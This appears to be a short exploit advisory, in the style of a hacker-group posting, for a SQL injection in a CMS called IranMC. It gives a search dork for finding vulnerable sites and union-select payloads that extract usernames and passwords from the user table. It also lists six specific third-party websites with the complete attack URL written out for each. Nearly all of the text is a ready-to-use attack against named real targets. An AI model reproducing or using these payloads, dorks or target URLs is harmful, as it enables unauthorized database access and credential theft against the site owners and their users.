################################################################  
# Author: Bl4ck.Sc0rpi0n , BenYamin YuseFzadh
# 
#
# 
# Email : Bl4ck.Sc0rpi0n@yahoo.com
#
# Site :www.EnigmaSecurity.Net
#
# Weblog : www.Kamyab-Hack.Blogfa.Com
#
# 
################################################################ 
# 
# App Name:  IranMC CMS
# 
# App Home: www.iranmc.org
# 
# Dork: inurl:zcat.php?id=
#
# Vuln column number: 3,4
#
# Default columns name : user,pass
# 
# POC: -1+union+all+select+1,2,concat(user,char(58),pass),4+from+user--
#
# P0C-2: -1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user-- 
#
# 
#
# Examples:
# 
# http://www.irnovin.com/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--

# http://www.sharghishop.com/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--

# http://www.filmkala.ir/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4+from+user--

# http://www.rasashop.com/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--

# http://dvdkala.ir/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--

# http://www.asemanbook.com/zcat.php?id=-1+union+all+select+1,2,3,concat(user,char(58),pass),5+from+user--
# 
################################################################